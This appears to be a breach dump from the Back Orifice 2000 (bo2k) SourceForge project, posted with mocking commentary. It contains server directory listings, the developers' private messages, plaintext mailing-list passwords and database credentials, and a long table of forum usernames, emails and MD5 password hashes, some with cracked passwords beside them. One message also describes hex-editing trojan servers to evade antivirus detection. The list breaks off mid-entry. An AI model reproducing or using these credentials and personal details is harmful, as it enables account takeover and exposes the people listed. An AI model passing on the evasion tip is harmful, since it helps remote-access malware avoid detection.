13 2007 Development -drwxr-sr-x 2 126114 5487 4.0K Mar 21 2007 DiggerX -drwxrwxr-x 5 58519 5487 4.0K Jan 25 2007 docs --rw-r--r-- 1 126114 5487 11K Feb 7 2007 documentation.html --rw-rw-r-- 1 126114 5487 11K Jan 23 2005 documentationold.html.old --rw-rw-r-- 1 58519 5487 7.6K Jul 2 2003 featurelist.html --rw-rw-r-- 1 126114 5487 5.7K Mar 23 2007 feedback.html -drwxr-sr-x 2 252872 5487 4.0K Apr 18 2007 files -drwxr-sr-x 2 126114 5487 4.0K Mar 23 2007 Fluffy -drwxrwxr-x 2 126114 5487 4.0K Mar 27 2006 forum -drwxrwxr-x 10 126114 5487 4.0K Mar 22 13:35 forums -drwxrwxr-x 3 58519 5487 4.0K Jul 26 2006 img --rw-rw-r-- 1 126114 5487 5.2K Aug 16 2005 index2.shtml --rw-rw-r-- 1 58519 5487 4.9K Jul 8 2003 index2.shtml.bak --rw-rw-r-- 1 58519 5487 3.4K Apr 3 2003 index3.shtml --rw-rw-r-- 1 126114 5487 3.4K Apr 3 2003 indexold.shtml --rw-r--r-- 1 126114 5487 2.7K Dec 17 2006 index.shtml -drwxrwxr-x 2 nobody 5487 4.0K Nov 17 2002 lovebeads --rw-rw-r-- 1 126114 5487 1.1K Dec 17 2006 newfilereleases.old --rw-r--r-- 1 126114 5487 1.5K Mar 21 2007 newfilereleases.txt --rw-rw-r-- 1 58519 5487 3.3K Jul 2 2003 news.shtml --rwx------ 1 126114 5487 61 Jul 12 2007 nov1.sh --rwx------ 1 126114 5487 52 Aug 5 2007 nov2.sh --rwx------ 1 126114 5487 47 Mar 24 10:51 nov3.sh --rwx------ 1 126114 5487 46 Mar 24 10:54 nov4.sh -drwxrwxr-x 10 58519 5487 4.0K Dec 11 2006 novice -drwx------ 9 126114 5487 4.0K Apr 8 09:44 novice222 -drwx------ 2 126114 5487 4.0K Mar 24 10:57 novice222b -drwx------ 11 126114 5487 4.0K Aug 8 2007 novice222c -drwx------ 10 126114 5487 4.0K Apr 3 19:59 novice222d -drwx------ 2 126114 5487 4.0K Sep 15 2006 NoviceP --rw-rw-r-- 1 nobody 5487 253K Jun 3 2002 rk_044.zip --rw-rw-r-- 1 126114 5487 27 Mar 31 12:17 robots.txt --rw-rw-r-- 1 126114 5487 13K Aug 16 2005 rootkit_bookcover.jpg --rw-rw-r-- 1 nobody 5487 22K Jan 22 1997 slant.ttf -drwxrwxr-x 5 58519 5487 4.0K Mar 21 2007 software --rw-rw-r-- 1 127066 5487 439K Dec 15 2003 srv_jpeg.zip --rw-rw-r-- 1 nobody 5487 24K Jul 10 2002 srv_scanpw.dll -drwx------ 2 126114 5487 4.0K Sep 17 2006 tars --rw-rw-r-- 1 58519 5487 4.2K Jul 2 2003 whatis.html - -./htdocs/buda: -total 2.6M -drwxrwsr-x 6 142021 5487 4.0K Oct 15 2006 . -drwxrwsr-x 24 nobody 5487 4.0K May 5 13:29 .. --rw-rw-r-- 1 142021 5487 2.1K Jun 9 2004 1641.jpg --rw-rw-r-- 1 142021 5487 101K Oct 4 2004 1.jpg --rw-rw-r-- 1 142021 5487 31K Oct 4 2004 2.jpg --rw-rw-r-- 1 142021 5487 21K Oct 4 2004 3.jpg --rw-rw-r-- 1 142021 5487 32K Oct 4 2004 4.jpg --rw-rw-r-- 1 142021 5487 83K Nov 11 2004 allgui.jpg --rw-rw-r-- 1 142021 5487 2.6K Jun 9 2004 avatar.gif --rw-rw-r-- 1 142021 5487 2.9K Oct 28 2004 avatar.jpg --rw-rw-r-- 1 142021 5487 14K Jun 14 2004 Buda.jpg --rw-rw-r-- 1 142021 5487 44K Oct 6 2004 crazy.jpg --rw-rw-r-- 1 142021 5487 122K Oct 6 2004 gmail.jpg --rw-rw-r-- 1 142021 5487 39 Oct 17 2004 index.html --rw-rw-r-- 1 142021 5487 3.6K Aug 26 2003 links.html --rw-rw-r-- 1 142021 5487 139K Sep 29 2004 loladas.jpg --rw-rw-r-- 1 142021 5487 225K Jun 29 2004 lol.jpg --rw-rw-r-- 1 142021 5487 257K Dec 23 2004 misc_bopeep.dll --rw-rw-r-- 1 142021 5487 122K Jan 13 2005 misc_bopee.rar -drwxrwsr-x 2 142021 5487 4.0K Oct 22 2004 newgui --rw-rw-r-- 1 142021 5487 38K Oct 4 2004 new.jpg --rw-rw-r-- 1 142021 5487 44K Oct 14 2004 newok.jpg -drwxrwsr-x 2 142021 5487 12K Jan 21 2005 peepdoc --rw-rw-r-- 1 142021 5487 66K Dec 13 2004 peep jpeg.JPG --rw-rw-r-- 1 142021 5487 30K Dec 13 2004 peep stdn.JPG -drwxrwsr-x 2 142021 5487 4.0K Mar 31 2004 pics --rw-rw-r-- 1 142021 5487 3.4K May 6 2004 plugins.html --rw-rw-r-- 1 142021 5487 8.7K Dec 22 2004 POR2.gif --rw-rw-r-- 1 142021 5487 32K May 26 2004 screen.jpg --rw-rw-r-- 1 142021 5487 940K Jun 11 2004 setup.exe --rw-rw-r-- 1 142021 5487 140K Aug 26 2004 telnet.jpg -drwxrwsr-x 4 142021 5487 4.0K Jan 26 2004 tut - - - CHECK OUT HOW LAME THESE KIDS ARE: - - -From Fluffy - Novice222: - -Well i still cant compile it with any visual studio but i will try on with 6.0 and the errors there -are a few linking errors: -LIBCMTD.lib(dbgheap.obj) : error LNK2005: _malloc already defined in fake_libc.obj -LIBCMTD.lib(dbgheap.obj) : error LNK2005: _free already defined in fake_libc.obj -LIBCMTD.lib(dbgheap.obj) : warning LNK4006: _malloc already defined in fake_libc.obj; second -definition ignored -LIBCMTD.lib(dbgheap.obj) : warning LNK4006: _free already defined in fake_libc.obj; second -definition ignored -Creating library Debug/srv_fun.lib and object Debug/srv_fun.exp -LIBCMTD.lib(crt0.obj) : error LNK2001: unresolved external symbol _main -Debug/srv_fun.dll : fatal error LNK1120: 1 unresolved externals -i dont know what to do. Confused -Also one thing that has been on my mind, authentification.... when making a server with it in the -gui it says "Single User" does that mean it was made in the - -thought of making one later that could support multi users? - - - -Check Your email Fluffy - Novice222 : -Wow thanks, i guess that was directed to my messiness Laughing (it was realy nice that you took the -time and i had a look and i think its ok if you post it - -though i cant compile it myself Crying or Very sad ) however i cant compile it Confused BTW what -version are you using to compile your projects, ive tried - -2005 and 6.0 and neither works with it..... i just dont understand whats visual studios problem -Question anyways i dont realy know how to setup 6.0 ive just - -new since installed it, so i think i might eventually make it work. Rolling Eyes - - -New Admin Fluffy - Novice222: -Wow.... sounds sweet.... though im not good enough to do the programming work..... but if i will -try my best Very Happy - -New Admin Fluffy - Novice222: -Ok, i will find info on those and download something Razz . Also I dont know anything about unix -but im a really good PHP programmer. - -New Admin Fluffy - Novice222: -Oh thanks.... but are you still going to be here as much or are gonna take some time off? Razz I -have Smart FTP 2 which should be able to do all ftp tasks. I - -know i dont know a lot about these developer programs but i will learn it pretty quickly. - - - - - -New Admin - Digger - Fluffy: -Ok, I updated your Title and permissions to Project Administrator.I will try to recruit a person or -two that are good with C+ cause I my self don't know it - -yet. I want to help keep us moving foward and help update and expand Bo2k's plugin selection. - -New Admin - Fluffy - Digger: -Wow.... i did except that sooner or later but not so out of sudden.... i guess we will have to -learn C++ then. - - - - -New Admin Fluffy - Digger: -C++, a good tutorial and some aspirins. - -New Admin Fluffy - Novice: -I need some help getting started with making C++ work (Visual C++ 6.0) ive tried to compile botool -just as a test and got some errors and i dont know what to - -do. Well really just two different errors but i dont know how to fix them. -cli_botool\clzhcompress.cpp(465) : error C2065: 'FileName' : undeclared identifier - -I get a lot of these undeclared identifier errors in clzhcompress.h and only there.... ?? And i -also get errors about cli_botool\src\explorefunc.cpp(31) : - -fatal error C1083: Cannot open include file: 'botool.h': No such file or directory botool.h and -resource.h not being there though they are in the project as - -they are supposed to be..... ?? I would be really grateful if you could help me with that. - -Shell Fluffy - Novice: -How can i access the saved files of bo2k? (dont know that stuff Razz ) With shell server right? But -i can only connect to my folder which is empty.... - -Devteam Fluffy - Novice: -I am updating the site since its kinda outdated. (just links and stuff) in -http://bo2k.com/dev/devteam.html what should be displayed as your name? - -Coranto Fluffy - Novice: -How do i use coranto? Or do i have to do the news manually? - -CVS Fluffy - Novice: -I have a problem with CVS.... and i dont know what to do..... no matter what i try i cant -connect..... i get: -....\Temp\TortoiseCVS make new module temp\: cvs.exe -q import --m bo2k_plugins tcvs-vendor tcvs-release -CVSROOT=:ext:fluffy-stuff@bo2k.cvs.sourceforge.net:/cvsroot/bo2k - -cvs [import aborted]: end of file from server (consult above messages if any) - -Error, CVS operation failed - -do you know anything about that? - -New Source Fluffy - Novice: -Ok.... for the first time everything is working however i downloaded all the bo2k files via CVS but -the stuff is old.... where are the new sources?? (sorry - -for spamming like that but im just not very used to this yet) - -New Source Fluffy - Novice: -What about bopeep? The only source download for it i found was version 0.9 and in the SSH i found -version 1.1 (i found that out after compiling it). I would - -really like the new source and see if i can fix the copy button..... because till now visual studio -hasnt worked but now it does so i can compile the plugins - -which means that i can make it. Only one question for that..... which way did you intend to make -the copy button work? (i heard you can convert the screen to - -an HBITMAP and then copy it to clipboard). -PS: phpBB works again all out of sudden..... - -Coranto Fluffy - Novice: -I have a problem with the coranto folder.... when i try to change the ch back to 770 SSH tells me -"Error writing file atributes"..... - -Coronto Fluffy - Digger: -(sorry if it took some time to respond.... my phpBB account was screwed....) Ok account name -DiGgErX and pass "diggerx" non capital (you should change that) - -Well after posting a news in coranto you will have to use SSH Secure Shell to move the new news -files into the coranto folder.... you will only need a single - -command. http://charlotte.at.northwestern.edu/bef/sshdist.html#windows download it and connect to -sourceforge (shell.sourceforge.net port 22). In file - -transfer client you can see all the bo2k website data (/home/groups/b/bo/bo2k/htdocs/) but you wont -need that to move the news files into the coranto - -folder.... instead open the Shell Client and put in the command: cp -/tmp/persistent/bo2kdata/NewsFiles/* /home/groups/b/bo/bo2k/htdocs/coranto so you wont - -always have to browse down to those folders. You will also need a CVS tool for the bo2k sources -http://www.tortoisecvs.org/ and an ftp client - -http://www.softpedia.com/get/Internet/FTP-Clients/SmartFTP.shtml . The ones above are just those -which i recommend... you can use any tool you want. - - - -Info Passwd Novice - Digger: -Digger you can forward this to Fluffy..... -Sorry for the delay guys but I was away and didn't have -access to the necessary material. -Here are all the passwords to the mailing lists.....they -aren't used much anymore...they have been deemed almost -obsolete by the phpBB - - - -New Programmer Digger - Fluffy: -Tell me what you think. This was the email. - -Hi - -I am interested in providing help for your project. I have -worked in C/C++ last 5 yrs. And I remember using BO2K long -time back and found it interesting. Let me know if I can be -of any help to you.... - -thanks -Srinivas - -New Programmer Fluffy - DiggerX: -Sounds great.... i already would have a little job for him.... but first novice has to tell me -where the new bopeep sources are - -New Programmer Digger - Fluffy: -Ok, looks good so far. This person can start with in a week. What do you think we should have him -look at/work on first, to see what he can do? Should we - -have hime make a new plugin or just add to or fix a small bug in one? If so, which bugged plugin? -Or, should we really put him to the test and see if he can - -brind the RootKit up to date with Vista? Let me know what you think. - - -ps. Been reading C and C++ for Dummies. So far only able to add some line of code to those small -test programs. Still have a very long way to go in - -understanding the complete lang. - -Thanks -DiGgErX - - - -Making Server undetectable Digger - Fluffy : - -I don't wan't to post this info cause AV people could be around, you never know. I simply Hex edit -my servers. I found encrypter just screw things up. Hexing - -I can still edit my servers with config tool and server work 100%. Still tring to understand C++ -have some tuts but learning this on my own is hard. Talk - -later... - - - -Digger being hardass to no0b: -(You must be a active and provide on going participation in our forum)Sorry but, I see you only -have 2 or so post. This small app has nothing to do wth our - -project however I like to give back to our members that have proven to show a true interest in our -project by helping other members with questions and such. - -Our project is Free to use and of course open source so other may change or improve it they will. I -some times come across other apps or ideals that I make - -available to our members. Such software as my netstat killer is availible to the select few. I have -updated this app and will soon post a link. I will be - -more than happy to give you the pw once I see you being active with legit post. Heres pw to the -first release you have. Enjoy!alphadeltatango1013xz2007 - - - - - PASSWORDS PASSWORDS PASSWORDS: - - -Bo2k-dev list - imagelist -Bo2k-general - listbutt -Bo2k-cvs_updates - listc1v2s3 -bo2k-users - dragenter - - -$dbhost = 'mysql4-b.sourceforge.net'; -$dbname = 'b4487_phpBB'; -$dbuser = 'b4487rw'; -$dbpasswd = 'thepiggy'; - -AndreR 43d5c7dc251e50787cf5c92d1e813277 andrereis@users.sourceforge.net - -catkinson 3d5524b7a2c1dcd6f936cfe822b36fa1 catkinson@stillsecure.com - testlab -michaeless 4310bc7480e027b4b5aede530e4ee9df michael.w.essary@us.army.mil - 8letters -DiGgErX fbd6f8fdb2ad1e8837e763ce54502938 - 246868 -Fluffy cb0de5de71eec74a2c4ec6ebc9decfb4 fluffy-stuff@users.sourceforge.net - warumich - -AndreR 43d5c7dc251e50787cf5c92d1e813277 andrereis@users.sourceforge.net -Andy289 e502486ae444b876917c0267371f7f9f Andy155@gmail.com -martinmueller d3103f022b66619fcc3002cef386d3bb k2000win@yahoo.com -Borealis404 3dae8d135fdd2fea15466039ad7b880c minstrel@outgun.com -whipaz f9e960903f96b3606fec2ed914d40798 whipaz@whip.sourceforge.net -novice222 a82c6fc93e8638a821eae80416b20a33 novice222@users.sourceforge.net -davidleebjr dfd6a6509b923084605a31e2b9028a06 davidleebjr@gmail.com -cruxcriticorum e2fd2b03ec512467f30aee772ef5a9d2 cbrien1@ucok.edu -rkuk d0199f51d2728db6011945145a1b607a cya@hotmail.co.uk -azure_br 34e64393f47d54c3f94a29f70fd2479a azure_br@yahoo.com -O.Z.I b04d69c159c0c530ff1185dd9c5e67a5 yo81_2@hotmail.com -caustic d750e64f8deb5b64bd85f804a415c5ef caustic@softhome.com -Memo c39bcb8926ae17556e616e86fc03b110 mttelli@hotmail.com -ethancottier 26a49849343376cd87f42062e7319b18 ejc2k6@hotmail.co.uk -u8rwv 83449d980192216a47c7558e6444de12 u8rwv@gawab.com -flizzle79 0296cc7e4952b2368f86d479738ce996 flizzle79@yahoo.com -test1972 647042ccc182c27ea0687e2a3ea91683 cs_marius@yahoo.com -maluk00 ff62abf1b405060874fc88c6f4a2f224 zepunheta3@yahoo.com.br -carpman54321 ce3564a0b5be01cd3d38f4d183366981 carpman54321@blueyonder.co.uk -aiscs2003 e2a7106f1cc8bb1e1318df70aa0a3540 aiscs2003@yahoo.com -Caleb 4cefb24d824696988c7b1d38b35b69e8 tommasodoria84@hotmail.com -Itachi Uchiha e2798af12a7a0f4f70b4d69efbc25f4d alurenxx@hotmail.com -tumsalot 67d02697c3a3993d5433c36826e3a666 tumsalot@hotmail.com -TRINITY 1e638553c85cfe4d32b8cde0e782d600 BRIAN@BWPARKER.CO.UK -texdim d681a9538c7d09b52c8de756f7af5dca cahmet19@yahoo.de -netwalker a5f31a4eaba532237ae1aefa7fa6d5c6 netwalker@126.com -iamapyro bf779e0933a882808585d19455cd7937 iamapyro@gmail.com -ignatowski 44224afe08dcfac69e15204fcad8675c expatriate7@yahoo.com -snip3rmast3r d343454654125dd494e0d598510d5913 soccerking@gmail.com -terekeme 3baa0c5965b96504ae299f948d05b09f atakan_bilici@hotmail.com -shsstudent 989ebec06dd210d049cbe405243cb887 dkleinrodick@gmail.com -Th3ChaS3r a4fd8e6fa9fbf9a6f2c99e7b70aa9ef2 Th3ChaS3r@hotmail.com -captainhowdy313 42a5f80b9af9355098c98b469ed2dcee captainhowdy313@yahoo.com -joba356 fe0706c95722e84b7ea07555be0ab8f8 joba356@yahoo.com -Zed bebf366466ea5fde1565bc77ca199414 protocol_zed@hackermail.com -pillowtop a82c6fc93e8638a821eae80416b20a33 pillow@hotmail.com -matcb d24cc833a110ff734188ccc88765c52d matcb@cox.net -bluecell 827ccb0eea8a706c4c34a16891f84e7b blue_ww_17@hotmail.com -Samoski 3db634c20d72bf185962935c42fdbac5 samoski@gmail.com -Smeghead 4003457120238099ce14865e69bc609c fielfran@yahoo.com -XpyXt a85a0c4e21ea44c8c34fac27cf1c0be2 xpyxt@xpyxt.no-ip.org -Csmith197 a8ff26d4802b18033a97eb4aa4b757aa affection4defection@yahoo.com -LastProphecy e39a2a06ea7520715802b155edab49d3 lastprophecy@gmail.com -NatasD 597020e0296763d64db2ced581d4eea4 natasd@gmail.com -Dyzan a417816ec35f5e1f31688bd9c52754a3 b_marsland@hotmail.com -RigPig f6e8ede6ab48bfc97002d6af0ee1dea2 RigPig.Sparky@Gmail.com -kiyoshi69 673dc13e1fad11b1b5a020ec6a4ba941 kiyoshi_patton@yahoo.com -femme_BO bcec6d11f54a16b5035a7b347cd28da7 femme_BO@yahoo.com -user1339 f878cabef8612d6ebb18aaf9e6fb6039 commonmail@land.ru -galadran 7daacea5f373b4c1c054158b126d317f dennisjackson249@hotmail.com -gasto f3ac8d1786dcf1df1c7137cf246be7f9 gas_zub@argentina.com -soupnut 722953519f567a69c84226183e7e88b0 soup@home.com -rockinguy 32c46870d28dd5c8cd77e29f9697e826 hottywashere@yahoo.com -jawatech 00a1f187721c63501356bf791e69382c frankbeans86@gmail.com -mediamaster cf5a300af972c6e9cf96f2eb705e8998 frescolana2001@yahoo.it -MEme d948aed52a69a6e26b9f466544f3600f pjwhite69@hotmail.com -DiGgErX fbd6f8fdb2ad1e8837e763ce54502938 speakfree@icmail.net -Eraser ea9927b12c455c9b89aa23783a81a790 admin@finhosting.fi -rewind 345e98f2d5fcb1a656ff710cb11a664f rew@yahoo.com -webman f0dc81a8a980333e911f475b62f6f238 webman@gmail.com -denisq bc55cdd78e059b9c0935dfdda17a280a quentindenis@compuserve.de -nightfire09 608b69bf4a461e21c253e7ef5ddad42b x1001x7@hotmail.com -imburne 53ba46c5dac9f4a38a6988056f7498c2 sales@m-s-a.org -fatnegro fe320ae47bb5d2a6828d5e45132ea1ed fatnegro@hotmail.com -xdarcx 99f446f7227ddd1367609ee4426965bd xdarcx@gmail.com -csacsi c071bd38e4c31ed73ec02faa32b52e4a odpqrcin@no.spam.hu -PitHH c4f45f022f9419eb421a0b809b218f41 PitHH@web.de -9happy 7ae4e20d98bc0dd60394759866d95067 Splinters_hurt@msn.com -andregtz 68dc4fc00786f8fc458f45d918d57761 andregtz@gmail.com -ferkine aa1d9939248e43d4d627ca146b59928f ferkine@tin.it -umbral e10adc3949ba59abbe56e057f20f883e beaton_13@hotmail.com -xslippy 9bf0dabb4794189eeaeda5b641033256 xslippy@hotmail.com -idav5d 63bcabf86a9a991864777c631c5b7617 idav5d@yahoo.com -mallard e799bf03d1c9918e6b62e90787a9ef5f stuartbrockman@hotmail.com -bob23 c29568b819422a045610cdddc2a2e407 bob23910@gmail.com -bugmenot 06215119a062b9bbb377be58c4253e90 alucard@deliriumservers.com -Trampi b9e83f5ca6e0c01f68e46e9e89126cf6 trampi-in-clans@arcor.de -govinda d24554b0039832786a82e4c6b8912296 govinda1100@gmail.com -chunger 65fc6b19138247ce12d2c400ba901080 chrischung030390@yahoo.com -phrack83 7fa511de4379e07da89d95ed896d581e cr.glenn06@gmail.com -Lagato333 f6c0c0740fa19d1a1940fd55732a65b6 lagato333@sbcglobal.net -FreezeS fdf809bb9ff58ff6ff80c787ca9739a7 gido_b@yahoo.com -sonikin c2aadac2ca30ca8aadfbe331ae180d28 sonikin@gmail.com -timlann 8cc539c0103ce9f01228ff8391d1f81b timlann@hotmail.com -d3ad connection 6a7c88a8ca307cb48e06953690e1463e d3ad.connection@gmail.com -dosken e2a7106f1cc8bb1e1318df70aa0a3540 dosk3n@talkcrazy.com -JoshBosh 640258597cbc50037072712f964cf5d8 joshbosh@gmail.com -Peter d632c5b38096402559a993db8d20fa88 liude11@163.com -Flatline 414fcefac8c21bdb4850fbf47381889c angutimmariklf@hotmail.com -sistem 6c44e5cd17f0019c64b042e4a745412a sistemrequirement@hotmail.com -avaterera 678bfee0251b5651a533371d347b5c2d avaterera@gmail.com -jim e10adc3949ba59abbe56e057f20f883e zdavid008007@yahoo.com.cn -MysticMan d183f98f620f0c800796c450f109a31a mysticm8o@aol.com -Xer0 d189d29566db8b6502f95bb1137bb904 n23@arcor.de -steelcap 48f3c1efb5b4a1b66ae727dd88c8ce18 steelcap@gmail.com -Mako 33cadc1ff0d7b2bb2493a1c97923368c bniron@gmail.com -demikeman72 d786a19a66e63d4a66cb1843853d20da mike@reddsquare.com -Sarius 7ff5e4bb04d3f57ab74386bf84e469dd durbinj@gmail.com -user 2fe7127432b015b899a106d4bc5c17c1 darko_rus@yahoo.com -bobhax 814989b983fd853fb374e1676a06ade4 bobhax@gmail.com -PvtDed ca92e18c564a7cf989cc2b21c789be37 the.extraordinary.revolutionary@gmail.com -sTupID 4933a8a7148e7006ea1609f2bfe19849 xxdefconxx@yahoo.com -schischi c7a1a7bc1ea56a8aade779b3ab312330 dama.k@gmx.net -darth_maul d8578edf8458ce06fbc5bb76a58c5ca4 narutomaul@hotmail.com -KillThePoets 3c8a79f81a4c1640353f1c2459a6f77f KillThePoets@gmail.com -frontlineslave 82b48ec8fc18fa85a78d4b22b79b47c6 cole_devon@hotmail.com -halfinchwrench e512ced7acdc3d9dc8951300fab3bc99 halfinchwrench@yahoo.com -jone 33bcea61ff7edac1e6c777b5d6607076 thecount202@HOTMAIL.COM -fycp1969@yahoo.com 94363ddf617853d4845fb55f465d62e4 fycp1969@yahoo.com -Jamez 96513f904efafc853494fa1e493891a8 r3kl4m@hotmail.com -joakin 64043fe8ef763138f79ce422d2eaa4b3 mg5proo@googlemail.com -lordlame 9f2f17eddebafa5a620b836a494ebf8e carbuncle@eircom.net -smitty192 5f4dcc3b5aa765d61d8327deb882cf99 dirtridersmitty@gmail.com -binary_g0d 8e1f8d765d8447f2a0e7f2ec2c81d75b binary_g0d@yahoo.com -kasper b0d290155d6d30003b468744dc3e7823 kasper673@yahoo.com -Stringer 8d45c85b51b27a04ad7fdfc3f126f9f8 Stringer2007@gmail.com -koetjeownz 9479cdbeecb0c3dd1b0a97b7e383e990 koetjeownz@gmail.com -mschouse 342738df3bd22244d22f39a3e2cff8a3 mschouse@hanmail.net -albenizneto 7097c69560c16269bdba97b6885b3a74 albenizneto@yahoo.com.br -clipz702 c5327995bc6fcbf868d9697769430850 mindskape@hotmail.com -lrobin5000 8899fdd01216768642f5595850668e0a lrobin5000@hotmail.com -oD_C d04ebb9288a75d7cdfccfc12d440f6bb od-c@hotmail.com -1337hax0r d343454654125dd494e0d598510d5913 liveforsoccer2000@Yahoo.com -holderego af4a6d13ab91894878a3e505a4943a7a thenameisokey@hotmail.com -Flytrap6000 f335391408372ddfbcf53e5389994b1f Pictus_cat@hotmail.com -RichardPendage df9601ca92666c00c400943bdc76ec3a richardintheface@live.com -totalnewb e5fb9291472a271a8019b5eb99bc4ac4 totalnewb@klanner.com -herr.jostein e7c229868bc23e93432b202b456df5a8 josteingroenvold8@msn.com -abcd12 84bf08b1e04b729f61803fe5d814cb19 adam_kranyczek@hotmail.com -g4hsean 6fabd3361ee02106337800f8abffec1b j_fast_and_the_furious@hotmail.com -MasterKevosavi 680b4a91ca9604713cadefe929ce9d5b masterkevosavi@gmail.com -onekosama 0d3c4ff57ab2ad95086ad725bcbecacd masato_ohnuma@hotmail.com -Sora2156 91844824385ac0a4abe2c0fd7ca61c30 shagster7@msn.com -minmin100 ead70a4cc827b99435a24da2f1919560 minmin100@hotmail.com -bebop d7de0d8a5a1d0555dc42fb20e4c35b58 bebop359@gmail.com -kyosho 89a34631d20f6cd49ed835068daccc6e kyosho_40cal@yahoo.com -Pureskills 9f651f3b52dec15921396e89d9f5729c Pureskills@gmail.com -daloo99 fd820a2b4461bddd116c1518bc4b0f77 daloo99@msn.com -DevilAsh 7199d24631b0ad7b0c07c5a4203f8446 ash790@msn.com -.:LzL:. 140e27ed024ac8d797e7bc6fe211377c lazariguella@gmail.com -dev1999 0b54bc61d41fe3d7a3a9900fe67a068e dev1999@citlink.net -sheepdestroyer 4e65f3c20bc1f5a16bc62b7f4083e226 sheepdestroyer@yahoo.fr -mptycoon 4928b456c7d81d70a6fa348fe3167d66 kapilarski@wideopenwest.com -pfunk b55cb03b5757b9be546b59e6067eb05a pyi1024@yahoo.com -costyy74 5ae27eb2468077190c47a591447d9b39 costyy74@yahoo.it -STeFanoZ 04c78f9abf9a7247cebe96fd03e51ffc Stuffe_89@hotmail.com -BOC80 38c8a8aefc18ffd01246581dd7b2833e boardsofcanada80@yahoo.com -harbourlight 0598643fe259b4c7da053d55711c7853 bc672h1u0llanxp@jetable.com -tus666 8077c9ab90e2aeb05af47e8d183fd542 tus666@gmail.com -perkunas170 85932b8fc2bc600492cffdcb797f2943 perkunas170@gmail.com -peridido 3de03db090e8f9d031437adb048c5354 dr8484@hotmail.com -MikiStrange 73a6fcb016535503154cecf09b787015 mik@mikistrange.com -FujiwaraTakumi 7a92eb0f63a29b36a94bd34d20ece1e1 fujiwaratakumi9@gmail.com -DjjOiNt fc52c21756c177325b755781195254d9 djj4281@gmail.com -jack 89e7115fcca05efdecedf5db54ff459c jack_nolan39@hotmail.com -undertwo b348e3f31e21f12b2096ae86183dd6ba jackeltwo@gmaiI.com -slagpants 1f5bbf4b087e1eb2bfe208aa738e9365 milno709@hotmail.com -swintec 04a8ca7bf49e7ecb4a32451676e929f0 swintec316@yahoo.com -Sir_Erik 8b1cc92b385eef9fa190cf5572fce3ca erik_musiclover@hotmail.com -simon987 37800e2c7e523baff72668e3da565a8d nacho.man988@gmail.com -Director bbd61bf090f12baaa277b9be1bf0868d Directingishard@hotmail.com -demikeman d786a19a66e63d4a66cb1843853d20da demikeman@yahoo.com -Ciduletz 572a637013b76beb10ed89576765294d cciduletz@yahoo.com -hassle 8c728e685ddde9f7fbbc452155e29639 hasslefree321@yahoo.com -misterpariah fd3013d609f5a33a82e8420830fc49ef mister.pariah@gmail.com -gazzat5 fea0f1f6fede90bd0a925b4194deac11 computerfreak123@hotmail.com -bacon a141c675cad7dd513b39657e68f53fb1 snoopy_ilmk@hotmail.com -tastelife c1dd730ac5d7355d8ac280a84a2c0db5 livesanuk@gmail.com -mikail b66e2466fcf71d0b81dc4cf2763311a2 demonelectronic@yahoo.com.tw -richasshit 55f9c405bd87ba23896f34011ffce8da hk@talent-search.co.uk -xpa 221a90cce8a8a5a9980a75a5852023d1 threescoreand7@hotmail.com -nicolagragnani 220fd5f82d4a5ecfac6ed242fabe9f7e nicolagragnani@gmail.com -ebu_talha bdc6a9d55a26ee383a9b5e7bf8e42c83 cameleon2401@hotmail.com -hackenbush d2343f98046b9d70e4de12210a5b8b37 fakehec@espuny.net -BaadJah 85932b8fc2bc600492cffdcb797f2943 d3nis@hotmail.fr -Teecee 32232e5f858d97f8f305bbe9894ecedb atb.croonen@chello.nl -darobe 4ac093b2bce069b4f9e212b5c1c8993b ventus10@freemail.hu -paint d5f7e034ce0515f1ec192170e6e4c1af paintballkev812@msn.com -cdiddy e10adc3949ba59abbe56e057f20f883e twstedup@hotmail.com -grumbla d01eb4a2e7f26dc0f6f7e068517a09e6 grumbla2@gmx.de -WITHEN 0d9f0003e392aca117a8e14a2f901d61 whosurgod2005@yahoo.com -MasterBlaster 3184bff5b95539d016f69a8f631eecea Ender1618@hotmail.com -R 9cb9d35d7b754c22b46513f79852ca2a robert.kettler@fs-computers.com -gl0Wyrm e982e3392aba7a9c6885b9376673c1b6 kazisiddiqui@gmail.com -giga e2f57f526fd64d7d6b2b2e6d277c88d7 gigamonkey@gmail.com -mikel54 db8310be55184671d9468ffc5086a16c shadymike54096@aol.com -fsk714 275565cc40a1c732b1a364aad95efe3a fsk714@yahoo.com -Xtremez 54140babce1cf37130a17608e659fff4 Bumzel@gmail.com -thang76 51a063885528534082cbcc8636136c7f thang76@gmail.com -Base 1f92a576aaedade5f10b6d6133ec0638 base_l@hotmail.com -JackoD. 8c19bdeadbfd1ae5a8e7dfaace6eb3e4 jackfeliciano@hotmail.com -johanmy 9dee45a24efffc78483a02cfcfd83433 johanmy@gmail.com -jsouroufis f9cd83caff29c3435faedd808c72e2ea jsouroufis@hotmail.com -Chasteleth 070af46980fb7b42bdaa8bb48460dfff chasteleth@gmail.com -Drox b999eafc7fe118e9548a71dcf8e17b28 agentaa@hotmail.com -Explorer2000 ae2b1fca515949e5d54fb22b8ed95575 genius_guy_del@yahoo.com -PuppetMaster 3f4e2d07ac1e192ff6190e93528510fb puppetmaster314@gmail.com -TheApeMan 84b9999691a4f1901131c96965203d2b theapeman@temporaryforwarding.com -goodtimefun4all 03cce09cae7331b8dc315ae4c89f4372 goodtime.fun4all@yahoo.com -henpa 08512a1f36042d5fdc2dcf20e43afb1b henpaum@terra.com.br -seiten 951b9b5f79c1fd936adebea5da75d040 letaian@yahoo.com -laroseur 5e10e322553bd75c11eecd5b53bf532f laroseur@hotmail.com -weedafile b99553d58d536eea92ce60c1bdf1de77 mygtavicec@msn.com -cultoffury ff9b12992f3d239c654cc1ff12ca373e cultoffury@yahoo.com -wildcat 7d06e43fcc3eeb59210c1d8ffec60064 nblackburn25@gmail.com -lboregard d3b155db86de65f52ca2f62703af5723 online.dumper@gmail.com -nirvana0909a 93279e3308bdbbeed946fc965017f67a nirvana0909a@hanmail.net -raygamer 33f2c6c14b1fcbaba977e5db64eb6b85 raygamer@cableone.net -Hedegaard-o1 da1f06233fed32a00332fb1703739623 meee.too@gmail.com -joseitopepe2 d36fc9a6cdf74c4629f89d41ce5f0e25 joseitopepe@hotmail.com -artmann 2e38529b9f60156e154be2abd0cc5ea7 artmann@rambler.ru -bithack c796285cdcc8a57b9872929230089e30 jsecurity7@naver.com -daswasda a05550b785fe9281c54161b4de3a9889 daswasda@hotmail.com -snive 0d9b14c84a0c0eaf4321149f6a5acccc snive@gmx.net -edgey 3ce05132f594425386bc4b60dd0e9822 matthews53us@yahoo.com -nestleomega 50eb4c97d945ffd660baeb263c34ce8c nestleomega@yahoo.com -Raika 08189ccb2df86fd43f59191277b4289a netherspectre@hotmail.com -2will748 